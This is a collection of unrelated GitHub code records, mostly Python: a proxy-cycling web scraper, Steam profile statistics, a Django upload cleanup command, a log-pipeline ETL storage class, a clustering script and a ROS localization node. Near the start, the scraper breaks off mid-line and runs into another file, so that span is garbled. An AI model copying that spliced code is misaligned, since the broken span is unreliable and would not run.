By breaking the search\n\tinto price intervals, this allows the search to stay below the 1000 index max.\n\t'''\n\t#parse command line arguments\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\"-threads\",\"--threads\", type=int, default=10)\n\tparser.add_argument(\"-proxy_total\",\"--proxy_total\", type=int, default=60)\n\tparser.add_argument(\"-proxy_refresh\",\"--proxy_refresh\", type=int, default=30)\n\tparser.add_argument(\"-proxy_wait\",\"--proxy_wait\", type=int, default=30)\n\tparser.add_argument(\"-timeout\",\"--timeout\", type=int, default=0)\n\n\targs = parser.parse_args()\n\n\t#global variables\n\tprice_range = [(1001,10000),(10001,20000),(20001,30000),(30001,40000),(40001,50000),(50001,60000),\n\t\t\t\t\t(60001,70000),(70001,80000),(80001,90000),(90001,100000),(100001,200000),(200001,2000000)]\n\n\tmax_index = 1000\n\tnum_proxies = args.proxy_total\n\tcycled_proxies = args.proxy_refresh\n\ttimeout = args.timeout\n\tproxy_wait = args.proxy_wait\n\tset_threads = args.threads\n\tthreads,proxies = [],[]\n\tdb_lock = Lock()\n\tproxy_lock = Lock()\n\tmain_Q = queue.Queue()\n\tworker_Q = queue.Queue()\n\tlogging.basicConfig(filename='error.log',level=logging.INFO,format='%(asctime)s:%(threadName)s:%(levelname)s:%(message)s')\n\n\t#main loop\n\tlogging.info(\"STARTING NEW ITERATION\")\n\tfor current_range in range(len(price_range)):\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tprint('populating queue for range {} ...'.format(price_range[current_range]))\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tQ = get_q(current_range)\n\t\tprint('retrieving proxies ...')\n\t\tprint('-----------------------------------------------------------------------------')\n\n\t\twhile len(proxies)= 2017][\"Id\"].count())\nten_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 10].count()[\"count\"])\nfifty_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 50].count()[\"count\"])\n\nprint(\"Currently crawled users: {}\".format(total_count))\nprint(\"{}% have provided a real name\".format(real_name_factor))\nprint(\"{}% have set a country\".format(country_factor))\nprint(\"{}% provided a city and state additionally to the country\".format(city_state_country_factor))\nprint(\"{}% of the crawled users have set their profile to private\".format(private_factor))\nprint(\"{}% of the crawled users are active (Logged in at least once this year)\".format(active_account_factor))\nprint(\"{}% have 10 games or more\".format(ten_or_more_games_factor))\nprint(\"{}% have 50 games or more\".format(fifty_or_more_games_factor))\n\n# Calculate graph data and display graphs\n\n# Game count\n\n# dfg_gc[\"count\"] = pd.cut(dfg_gc[\"count\"], [0, 1, 10, 25, 50, 100, 500, 30000],\n# labels=[\"0\", \"1 - 9\", \"10 - 24\", \"25 - 49\", \"50 - 99\", \"100 - 499\", \"500 +\"])\n# ax = sns.countplot(x=dfg_gc[\"count\"])\n# ax.set(xlabel=\"Game count\", ylabel=\"Number of players\")\n\n\n# Friend count\n\ndff_gc[\"friendcount\"] = pd.cut(dff_gc[dff_gc[\"friendcount\"] <= 50], [1, 50, 100, 150, 200, 250, 300, 350, 400, 999999],\n labels=[\"1 - 49\", \"50 - 99\", \"100 - 149\", \"150 - 199\", \"200 - 249\", \"250 - 299\",\n \"300 - 349\", \"350 - 399\", \"400+\"])\n\naxf = sns.countplot(x=dff_gc[\"friendcount\"])\naxf.set(xlabel=\"Friend count\", ylabel=\"Number of players\")\nfor item in ([axf.title, axf.xaxis.label, axf.yaxis.label] +\n axf.get_xticklabels() + axf.get_yticklabels()):\n 
item.set_fontsize(20)\nplt.show()\n","repo_name":"shiaky/mining_steam","sub_path":"code/data_explorer.py","file_name":"data_explorer.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5379032926","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom sorting_searching.peak_element import PeakElement\n\nclass TestPeakElement(unittest.TestCase):\n def setUp(self):\n self.func = PeakElement()\n\n def test_1(self):\n nums = [1,2,3,1]\n expected = 2\n self.assertEqual(self.func.findPeakElement(nums), expected)\n\n def test_2(self):\n nums = [1,2,1,3,5,6,4]\n expected = [1, 5]\n self.assertIn(self.func.findPeakElement(nums), expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/sorting_searching_test/test_peak_element.py","file_name":"test_peak_element.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20714453982","text":"#!/usr/bin/env python3\n#coding=utf-8\nimport os, sys\n\n\nDIR_UTILIDADES=\"..\" + os.sep + \"utilidades\" + os.sep + \"src\"\nprint (DIR_UTILIDADES)\n\n\nsys.path.insert(0, DIR_UTILIDADES)\nfrom utilidades.ficheros.GestorFicheros import GestorFicheros\ngf=GestorFicheros()\n\ngf.ejecutar_comando(\"./descargador_html.py\", \"\")\ngf.ejecutar_comando(\"./procesador_centros.py\", \">\", \"centros_region.sql\")\ngf.ejecutar_comando (\"cat centros_region.sql\", \"|\", \"sqlite3 ../../docencia.db\")\n","repo_name":"OscarMaestre/pruebas_proceso","sub_path":"descargador_html/dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20556580579","text":"# coding: utf-8\n\n\"\"\"\nManagement command to clean up any old files in the oppia uploads directory\n\"\"\"\nimport os\nimport shutil\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom oppia.models import Course\n\n\nclass Command(BaseCommand):\n help = \"Cleans up any old files in the oppia uploads and courses directory\"\n\n def handle(self, *args, **options):\n self.remove_no_matching_courses()\n self.remove_courses_no_file()\n self.remove_old_expanded_folders()\n\n def remove_no_matching_courses(self):\n \"\"\"\n Remove files that don't have matching courses\n \"\"\"\n files = os.listdir(settings.COURSE_UPLOAD_DIR)\n for filename in files:\n if filename.endswith(\".zip\"):\n # find out if it's a live course file\n courses = Course.objects.filter(filename=filename)\n if courses.count() == 0:\n # delete the file\n os.remove(os.path.join(settings.COURSE_UPLOAD_DIR,\n filename))\n self.stdout.write(\"Removed: \" + filename)\n\n def remove_courses_no_file(self):\n \"\"\"\n Flag up courses that don't have files\n \"\"\"\n courses = Course.objects.all()\n for course in courses:\n if not os.path.isfile(os.path.join(settings.COURSE_UPLOAD_DIR,\n course.filename)):\n self.stdout \\\n .write(\"FILE MISSING: %s for %s \" % (course.filename,\n course.title))\n\n def remove_old_expanded_folders(self):\n \"\"\"\n Remove old expanded folders from media/courses\n \"\"\"\n try:\n files = os.listdir(os.path.join(settings.MEDIA_ROOT, 'courses'))\n for filename in files:\n if os.path.isdir(\n os.path.join(settings.MEDIA_ROOT,\n 'courses',\n 
filename)):\n courses = Course.objects.filter(shortname=filename)\n if courses.count() == 0:\n shutil.rmtree(os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename))\n self.stdout.write(\"Removed: \" + filename)\n except FileNotFoundError: # dir doesn;t exsit\n pass\n","repo_name":"DigitalCampus/django-oppia","sub_path":"oppia/management/commands/cleanup_uploads.py","file_name":"cleanup_uploads.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"29582603882","text":"import copy\nfrom typing import Union\n\nfrom django.core.cache import cache\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.api import TransferApi\nfrom apps.exceptions import ValidationError, ApiResultError\nfrom apps.log_databus.constants import BKDATA_ES_TYPE_MAP, EtlConfig, FIELD_TEMPLATE, CACHE_KEY_CLUSTER_INFO\nfrom apps.log_databus.exceptions import EtlParseTimeFieldException, HotColdCheckException\nfrom apps.log_databus.handlers.collector_scenario import CollectorScenario\nfrom apps.log_databus.models import CollectorConfig, CollectorPlugin\nfrom apps.log_databus.utils.es_config import get_es_config\nfrom apps.log_search.constants import FieldBuiltInEnum, FieldDataTypeEnum\nfrom apps.utils import is_match_variate\n\n\nclass EtlStorage(object):\n \"\"\"\n 清洗入库\n \"\"\"\n\n # 子类需重载\n etl_config = None\n separator_node_name = \"bk_separator_object\"\n\n @classmethod\n def get_instance(cls, etl_config=None):\n mapping = {\n EtlConfig.BK_LOG_TEXT: \"BkLogTextEtlStorage\",\n EtlConfig.BK_LOG_JSON: \"BkLogJsonEtlStorage\",\n EtlConfig.BK_LOG_DELIMITER: \"BkLogDelimiterEtlStorage\",\n EtlConfig.BK_LOG_REGEXP: \"BkLogRegexpEtlStorage\",\n }\n try:\n etl_storage = import_string(\n \"apps.log_databus.handlers.etl_storage.{}.{}\".format(etl_config, mapping.get(etl_config))\n )\n return etl_storage()\n except ImportError as error:\n raise NotImplementedError(f\"{etl_config} not implement, error: {error}\")\n\n @classmethod\n def get_etl_config(cls, result_table_config, default=\"bk_log_text\"):\n \"\"\"\n 根据RT表配置返回etl_config类型\n \"\"\"\n separator_node_action = result_table_config.get(\"option\", {}).get(\"separator_node_action\")\n return {\"regexp\": \"bk_log_regexp\", \"delimiter\": \"bk_log_delimiter\", \"json\": \"bk_log_json\"}.get(\n separator_node_action, default\n )\n\n def etl_preview(self, data, etl_params) -> list:\n \"\"\"\n 字段提取预览\n :param data: 日志原文\n :param etl_params: 字段提取参数\n :return: 字段列表 list\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_bkdata_etl_config(self, fields, etl_params, built_in_config):\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_config(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n 配置清洗入库策略,需兼容新增、编辑\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_fields(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n META\n \"\"\"\n # field_list\n field_list = built_in_config.get(\"fields\", [])\n etl_flat = etl_params.get(\"etl_flat\", False)\n\n # 是否保留原文\n if etl_params.get(\"retain_original_text\"):\n field_list.append(\n {\n \"field_name\": \"log\",\n \"field_type\": \"string\",\n \"tag\": \"metric\",\n \"alias_name\": \"data\",\n \"description\": \"original_text\",\n \"option\": {\"es_type\": \"text\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else 
{\"es_type\": \"text\"},\n }\n )\n\n # 默认使用上报时间做为数据时间\n time_field = built_in_config[\"time_field\"]\n built_in_keys = FieldBuiltInEnum.get_choices()\n\n etl_field_index = 1\n clustering_default_fields = self._get_log_clustering_default_fields()\n for field in fields:\n # 当在聚类场景的时候 不做下面的format操作\n if etl_flat and field[\"field_name\"] in clustering_default_fields:\n field_list.append(field)\n continue\n # 过滤掉删除的字段\n if field[\"is_delete\"]:\n continue\n\n # 设置字段的来源与目标存储\n source_field = field[\"field_name\"]\n target_field = field[\"field_name\"]\n if field.get(\"alias_name\") and self.etl_config in [EtlConfig.BK_LOG_JSON]:\n target_field = field[\"alias_name\"]\n\n if target_field.lower() in built_in_keys:\n raise ValidationError(_(\"字段不能与标准字段重复\") + f\":{target_field}\")\n\n if not is_match_variate(target_field):\n raise ValidationError(_(\"字段名不符合变量规则\"))\n\n # option, 非时间字段的option里的time_zone和time_format都为\"\", 不需要入库\n field_option = {k: v for k, v in field.get(\"option\", {}).items() if k not in [\"time_zone\", \"time_format\"]}\n field_option[\"field_index\"] = etl_field_index\n etl_field_index += 1\n\n # ES_TYPE\n field_option[\"es_type\"] = FieldDataTypeEnum.get_es_field_type(\n field[\"field_type\"], is_analyzed=field[\"is_analyzed\"]\n )\n if field[\"is_analyzed\"] and field.get(\"option\", {}).get(\"es_analyzer\"):\n field_option[\"es_analyzer\"] = field[\"option\"][\"es_analyzer\"]\n\n # ES_INCLUDE_IN_ALL\n if field[\"is_analyzed\"] and es_version.startswith(\"5.\"):\n field_option[\"es_include_in_all\"] = True\n\n # ES_DOC_VALUES\n field_option[\"es_doc_values\"] = field[\"is_dimension\"]\n\n if not etl_flat:\n # REAL_PATH\n field_option[\"real_path\"] = f\"{self.separator_node_name}.{source_field}\"\n\n # 时间字段处理\n if field[\"is_time\"]:\n time_field[\"alias_name\"] = source_field\n time_field[\"option\"][\"real_path\"] = field_option[\"real_path\"]\n time_field[\"option\"][\"time_zone\"] = field[\"option\"][\"time_zone\"]\n time_field[\"option\"][\"time_format\"] = field[\"option\"][\"time_format\"]\n time_field[\"option\"][\"field_index\"] = field_option[\"field_index\"]\n # 删除原时间字段配置\n field_option[\"es_doc_values\"] = False\n\n # 加入字段列表\n field_list.append(\n {\n \"field_name\": target_field,\n \"field_type\": FieldDataTypeEnum.get_meta_field_type(field_option[\"es_type\"]),\n \"tag\": \"dimension\" if field_option.get(\"es_doc_values\", True) else \"metric\",\n \"description\": field.get(\"description\"),\n \"option\": field_option,\n }\n )\n\n field_list.append(time_field)\n return {\"fields\": field_list, \"time_field\": time_field}\n\n def update_or_create_result_table(\n self,\n instance: Union[CollectorConfig, CollectorPlugin],\n table_id: str,\n storage_cluster_id: int,\n retention: int,\n allocation_min_days: int,\n storage_replies: int,\n fields: list = None,\n etl_params: dict = None,\n es_version: str = \"5.X\",\n hot_warm_config: dict = None,\n es_shards: int = settings.ES_SHARDS,\n index_settings: dict = None,\n ):\n \"\"\"\n 创建或更新结果表\n :param instance: 采集项配置/采集插件\n :param table_id: 结果表ID\n :param storage_cluster_id: 存储集群id\n :param retention: 数据保留时间\n :param allocation_min_days: 执行分配的等待天数\n :param storage_replies: 存储副本数量\n :param fields: 字段列表\n :param etl_params: 清洗配置\n :param es_version: es\n :param hot_warm_config: 冷热数据配置\n :param es_shards: es分片数\n :param index_settings: 索引配置\n \"\"\"\n from apps.log_databus.handlers.collector import build_result_table_id\n\n # ES 配置\n es_config = get_es_config(instance.get_bk_biz_id())\n\n # 时间格式\n date_format = 
es_config[\"ES_DATE_FORMAT\"]\n\n # ES-分片数\n instance.storage_shards_nums = es_shards\n\n # ES-副本数\n instance.storage_replies = storage_replies\n\n # 需要切分的大小阈值,单位(GB)\n if not instance.storage_shards_size:\n instance.storage_shards_size = es_config[\"ES_SHARDS_SIZE\"]\n slice_size = instance.storage_shards_nums * instance.storage_shards_size\n\n # index分片时间间隔,单位(分钟)\n slice_gap = es_config[\"ES_SLICE_GAP\"]\n\n # ES兼容—mapping设置\n param_mapping = {\n \"dynamic_templates\": [\n {\n \"strings_as_keywords\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\"norms\": \"false\", \"type\": \"keyword\"},\n }\n }\n ],\n }\n if es_version.startswith(\"5.\"):\n param_mapping[\"_all\"] = {\"enabled\": True}\n param_mapping[\"include_in_all\"] = False\n\n params = {\n \"bk_data_id\": instance.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": build_result_table_id(instance.get_bk_biz_id(), table_id),\n \"is_enable\": True,\n \"table_name_zh\": instance.get_name(),\n \"is_custom_table\": True,\n \"schema_type\": \"free\",\n \"default_storage\": \"elasticsearch\",\n \"default_storage_config\": {\n \"cluster_id\": storage_cluster_id,\n \"storage_cluster_id\": storage_cluster_id,\n \"retention\": retention,\n \"date_format\": date_format,\n \"slice_size\": slice_size,\n \"slice_gap\": slice_gap,\n \"mapping_settings\": param_mapping,\n \"index_settings\": {\n \"number_of_shards\": instance.storage_shards_nums,\n \"number_of_replicas\": instance.storage_replies,\n },\n },\n \"is_time_field_only\": True,\n \"bk_biz_id\": instance.get_bk_biz_id(),\n \"label\": instance.category_id,\n \"option\": {},\n \"field_list\": [],\n \"warm_phase_days\": 0,\n \"warm_phase_settings\": {},\n \"is_sync_db\": False, # ES的index创建,不做同步创建,走异步任务执行\n }\n index_settings = index_settings or {}\n params[\"default_storage_config\"][\"index_settings\"].update(index_settings)\n\n # 是否启用冷热集群\n if allocation_min_days:\n if not hot_warm_config or not hot_warm_config.get(\"is_enabled\"):\n # 检查集群是否支持冷热数据功能\n raise HotColdCheckException()\n\n # 对于新数据,路由到热节点\n params[\"default_storage_config\"][\"index_settings\"].update(\n {\n f\"index.routing.allocation.include.{hot_warm_config['hot_attr_name']}\": hot_warm_config[\n \"hot_attr_value\"\n ],\n }\n )\n # n天后的数据,路由到冷节点\n params[\"default_storage_config\"].update(\n {\n \"warm_phase_days\": allocation_min_days,\n \"warm_phase_settings\": {\n \"allocation_attr_name\": hot_warm_config[\"warm_attr_name\"],\n \"allocation_attr_value\": hot_warm_config[\"warm_attr_value\"],\n \"allocation_type\": \"include\",\n },\n }\n )\n\n # 获取清洗配置\n collector_scenario = CollectorScenario.get_instance(collector_scenario_id=instance.collector_scenario_id)\n built_in_config = collector_scenario.get_built_in_config(es_version)\n result_table_config = self.get_result_table_config(fields, etl_params, built_in_config, es_version=es_version)\n\n params.update(result_table_config)\n\n # 字段mapping优化\n for field in params[\"field_list\"]:\n # 如果datetype不支持doc_values,则不设置doc_values,避免meta判断类型不一致创建新的index\n if \"es_doc_values\" in field.get(\"option\", {}):\n if field[\"option\"][\"es_doc_values\"] or field[\"option\"][\"es_type\"] in [\"date\", \"text\"]:\n del field[\"option\"][\"es_doc_values\"]\n # 移除计分\n if \"es_type\" in field.get(\"option\", {}) and field[\"option\"][\"es_type\"] in [\"text\"]:\n field[\"option\"][\"es_norms\"] = False\n\n # 时间默认为维度\n if \"time_option\" in params and \"es_doc_values\" in params[\"time_option\"]:\n del params[\"time_option\"][\"es_doc_values\"]\n\n # 获取结果表是否已经创建,如果创建则选择更新\n table_id = 
\"\"\n try:\n table_id = TransferApi.get_result_table({\"table_id\": params[\"table_id\"]}).get(\"table_id\")\n except ApiResultError:\n pass\n\n # 兼容插件与采集项\n if not table_id:\n # 创建结果表\n table_id = TransferApi.create_result_table(params)[\"table_id\"]\n else:\n # 更新结果表\n params[\"table_id\"] = table_id\n TransferApi.modify_result_table(params)\n cache.delete(CACHE_KEY_CLUSTER_INFO.format(table_id))\n\n if not instance.table_id:\n instance.table_id = table_id\n instance.save()\n\n return {\"table_id\": instance.table_id, \"params\": params}\n\n @classmethod\n def switch_result_table(cls, collector_config: CollectorConfig, is_enable=True):\n \"\"\"\n 起停result_table\n :param collector_config: 采集项\n :param is_enable: 是否有效\n :return:\n \"\"\"\n params = {\n \"bk_data_id\": collector_config.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": f\"{collector_config.table_id}\",\n \"is_enable\": is_enable,\n }\n TransferApi.switch_result_table(params)\n return True\n\n @classmethod\n def parse_result_table_config(cls, result_table_config, result_table_storage=None):\n \"\"\"\n 根据meta配置返回前端格式\n :param result_table_config metadata_get_result_table\n :param result_table_storage metadata_get_result_table_storage\n \"\"\"\n\n # 存储配置 && 清洗配置\n collector_config = {\"etl_params\": result_table_config.get(\"option\", {})}\n if result_table_storage:\n collector_config[\"storage_cluster_id\"] = result_table_storage[\"cluster_config\"][\"cluster_id\"]\n collector_config[\"storage_cluster_name\"] = result_table_storage[\"cluster_config\"][\"cluster_name\"]\n collector_config[\"retention\"] = result_table_storage[\"storage_config\"].get(\"retention\")\n collector_config[\"allocation_min_days\"] = result_table_storage[\"storage_config\"].get(\"warm_phase_days\")\n\n # 字段\n built_in_fields = FieldBuiltInEnum.get_choices()\n field_list = []\n time_fields = [item for item in result_table_config[\"field_list\"] if item[\"field_name\"] == \"dtEventTimeStamp\"]\n if not time_fields:\n raise EtlParseTimeFieldException()\n time_field = copy.deepcopy(time_fields[0])\n\n # log clustering fields\n log_clustering_fields = cls._get_log_clustering_default_fields()\n for field in result_table_config[\"field_list\"]:\n # 判断是不是标准字段\n if not field.get(\"is_built_in\", False):\n field[\"is_built_in\"] = True if field[\"field_name\"].lower() in built_in_fields else False\n\n # 聚类保留字段\n if field[\"field_name\"] in log_clustering_fields:\n continue\n\n # 如果有指定别名,则需要调转位置(field_name:ES入库的字段名称;alias_name:数据源的字段名称)\n field_option = field.get(\"option\", {})\n if field_option.get(\"real_path\"):\n field[\"alias_name\"] = field_option[\"real_path\"].replace(f\"{cls.separator_node_name}.\", \"\")\n\n if field.get(\"alias_name\"):\n field[\"field_name\"], field[\"alias_name\"] = field[\"alias_name\"], field[\"field_name\"]\n\n # 如果别名与field_name相同,则不返回\n if field[\"field_name\"] == field[\"alias_name\"]:\n field[\"alias_name\"] = \"\"\n\n # 时间字段处理\n field[\"is_time\"] = False\n if field[\"field_name\"] == time_field[\"alias_name\"]:\n field[\"is_time\"] = True\n field[\"is_dimension\"] = True\n # option\n field_es_type = field[\"option\"][\"es_type\"]\n field[\"option\"] = time_field[\"option\"]\n field[\"option\"][\"time_zone\"] = int(time_field[\"option\"][\"time_zone\"])\n field[\"option\"][\"es_type\"] = field_es_type\n\n es_type = field_option.get(\"es_type\", \"keyword\")\n\n # 字段类型\n field[\"field_type\"] = FieldDataTypeEnum.get_field_type(es_type)\n\n # 分词字段设置\n field[\"is_analyzed\"] = False\n if es_type == \"text\":\n field[\"is_analyzed\"] = 
True\n field[\"is_dimension\"] = False\n field[\"is_delete\"] = field.get(\"is_delete\", False)\n\n # 如果未设置维度,则获取es_doc_values的值\n if \"is_dimension\" not in field:\n field[\"is_dimension\"] = field_option.get(\"es_doc_values\", True)\n if field_option.get(\"es_type\") == \"text\":\n field[\"is_dimension\"] = False\n\n field_list.append(field)\n\n # 添加删除字段\n if result_table_config[\"option\"].get(\"separator_fields_remove\"):\n fields_remove = result_table_config[\"option\"][\"separator_fields_remove\"].split(\",\")\n for field_name in fields_remove:\n field_name = field_name.strip()\n if field_name == \"\":\n continue\n\n field_info = copy.deepcopy(FIELD_TEMPLATE)\n field_info[\"field_name\"] = field_name\n field_list.append(field_info)\n\n collector_config[\"fields\"] = sorted(field_list, key=lambda x: x.get(\"option\", {}).get(\"field_index\", 0))\n return collector_config\n\n def _to_bkdata_assign(self, field):\n key = field.get(\"alias_name\")\n if not key:\n key = field.get(\"field_name\")\n return {\n \"key\": key,\n \"assign_to\": key,\n \"type\": BKDATA_ES_TYPE_MAP.get(field.get(\"option\").get(\"es_type\"), \"string\"),\n }\n\n def _to_bkdata_conf(self, time_field):\n return {\n \"output_field_name\": \"timestamp\",\n \"time_format\": time_field[\"option\"][\"time_format\"],\n \"timezone\": time_field[\"option\"][\"time_zone\"],\n \"encoding\": \"UTF-8\",\n \"timestamp_len\": 0,\n \"time_field_name\": time_field.get(\"alias_name\"),\n }\n\n def _get_bkdata_default_fields(self, built_in_fields, time_field):\n result = [\n self._to_bkdata_assign(built_in_field)\n for built_in_field in built_in_fields\n if not built_in_field.get(\"flat_field\", False)\n ]\n if not time_field.get(\"option\", {}).get(\"real_path\"):\n result.append(self._to_bkdata_assign(time_field))\n result.append(\n self._to_bkdata_assign({\"field_name\": \"time\", \"alias_name\": \"time\", \"option\": {\"es_type\": \"long\"}})\n )\n return result\n\n @classmethod\n def _get_log_clustering_default_fields(cls):\n return {field[\"field_name\"] for field in CollectorScenario.log_clustering_fields()}\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_databus/handlers/etl_storage/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19917,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"28862100727","text":"w = float(input())\nh = float(input())\n\nw_to_cm = w*100\nh_to_cm = h*100\n\nrows = w_to_cm // 120\nh_to_cm -= 100\nburos_in_rows = h_to_cm // 70\n\nseats = rows*buros_in_rows - 3\nprint(seats)","repo_name":"yanchev93/SoftUni-Courses","sub_path":"SoftUni - Python/Python - PBasics/More exercise/PB/1_More_Excersice/5_training_lab.py","file_name":"5_training_lab.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36413492940","text":"from sklearn.cluster import KMeans,DBSCAN\r\nimport numpy as np\r\nimport scipy.io as si\r\nimport matplotlib.pyplot as plt\r\nX, Y, Z = np.loadtxt('filtereddata/XYZ_norm1.txt',skiprows=0,unpack=True)\r\nData = np.column_stack((X,Y,Z))\r\n#Z = np.hsplit(Data,np.array([80])) \r\n\r\n#kmeans =KMeans(n_clusters=2,random_state=42,max_iter=10000,n_init=100).fit(Z[0])\r\n\r\n# epsilon = np.arange(0.1,2,0.025)\r\n\r\n# for e in epsilon:\r\n\r\n# \tdbscan = DBSCAN(eps=e,algorithm='kd_tree', min_samples=2).fit(Data)\r\n# \tprint(e)\r\n# \tprint(dbscan.labels_)\r\n\r\ndbscan = DBSCAN(eps = 
0.874,algorithm='kd_tree',min_samples=2).fit(Data)\r\nprint(dbscan.labels_)\r\nprint(Data.shape)\r\n\r\n\r\n\r\n# print(Z)\r\n# pred = Data[1]\r\n\r\n\r\npred = np.column_stack((Data,dbscan.labels_))\r\nprint(pred.shape)\r\n\r\n\r\nfor index in range(0,len(Z)):\r\n\tif(dbscan.labels_[index]<0):\r\n\t\tprint(index)\r\n\t\tt = np.linspace(0, 2, 64, endpoint=False)\r\n\t\tplt.plot(t, Z[index-32:index+32], 'g-', linewidth=2, label='filtered data')\r\n\t\tplt.xlabel('Time [sec]')\r\n\t\tplt.legend()\r\n\t\tplt.show()\r\n\r\n\r\n#np.savetxt('filtereddata/predictxyz1.txt',pred,fmt='%1.15g')\r\n\r\nprint(\"Prediction data ready\")","repo_name":"saainithil97/roadsafe","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72637773929","text":"#! /usr/bin/env python\n\"\"\"\nConvert empty IPython notebook to a sphinx doc page.\n\"\"\"\nimport io\nimport os\nimport sys\n\nfrom IPython.nbformat import current\n\n\ndef clean_for_doc(nb):\n \"\"\"\n Cleans the notebook to be suitable for inclusion in the docs.\n \"\"\"\n new_cells = []\n for cell in nb.worksheets[0].cells:\n # Remove the pylab inline line cells.\n if \"input\" in cell and \\\n cell[\"input\"].strip().startswith(\"%pylab inline\"):\n continue\n\n # Make sure all cells are padded at the top and bottom.\n if \"source\" in cell:\n cell[\"source\"] = \"\\n\" + cell[\"source\"].strip() + \"\\n\\n\"\n\n # Remove output resulting from the stream/trace method chaining.\n if \"outputs\" in cell:\n outputs = [_i for _i in cell[\"outputs\"] if \"text\" not in _i or\n not _i[\"text\"].startswith(\"= os.path.getmtime(nbname):\n print(\"\\t%s is up to date; nothing to do.\" % rst_name)\n return\n\n os.system(\"runipy --o %s --matplotlib --quiet\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = clean_for_doc(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\n # Convert to rst.\n os.system(\"jupyter nbconvert --to rst %s\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = strip_output(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\nif __name__ == \"__main__\":\n for nbname in sys.argv[1:]:\n convert_nb(nbname)\n","repo_name":"yjgao-gfz/pyadjoint","sub_path":"pyadjoint/doc/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74371436008","text":"import math\nimport os\nimport pathlib\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom cv_bridge import CvBridge\n\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile, QoSReliabilityPolicy, QoSHistoryPolicy,QoSDurabilityPolicy\nimport numpy as np\n\nfrom nav_msgs.msg import OccupancyGrid\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose, PoseWithCovarianceStamped\nfrom vqa_msgs.msg import VisualFeatures\n\n\nfrom scipy import ndimage, signal\n\nfrom tf2_ros import TransformBroadcaster, TransformException\nfrom tf2_ros.buffer import Buffer\nfrom tf2_ros.transform_listener import TransformListener\nfrom tf2_ros.static_transform_broadcaster import StaticTransformBroadcaster\n\nfrom message_filters import 
ApproximateTimeSynchronizer, Subscriber, Cache\nfrom topological_mapping.topological_mapping.topological_map import TopologicalMap\nfrom geometry_msgs.msg import TransformStamped\n\n\nclass TopologicalLocalization(Node):\n def __init__(self):\n super().__init__('topological_localization')\n\n map_qos_profile = QoSProfile(\n reliability=QoSReliabilityPolicy.RELIABLE,\n history=QoSHistoryPolicy.KEEP_LAST,\n durability=QoSDurabilityPolicy.TRANSIENT_LOCAL,\n depth=1\n )\n\n # parameters\n self.declare_parameter('map_resolution', 0.050)\n self.declare_parameter('kernel_scale', 8.0)\n self.declare_parameter('question_qty', 10)\n self.declare_parameter('state_qty', 8)\n self.declare_parameter('max_images_per_state', 10)\n \n # it is the number the map(gridmap) shape will be divided by:\n self.kernel_scale = self.get_parameter('kernel_scale').get_parameter_value().double_value\n self.state_qty = self.get_parameter('state_qty').get_parameter_value().integer_value\n self.question_qty = self.get_parameter('question_qty').get_parameter_value().integer_value\n self.question_depth = self.get_parameter(\n 'max_images_per_state').get_parameter_value().integer_value\n # m/pix\n self.map_resolution = self.get_parameter(\n 'map_resolution').get_parameter_value().double_value\n\n self.__pkg_folder = str(pathlib.Path(__file__).parent.resolve()).removesuffix(\n '/topological_localization')\n self.map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map4.npy')\n self.image_map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map3.jpg')\n\n self.vqa_features = None\n self.image_converter = CvBridge()\n self.tf_static_broadcaster = 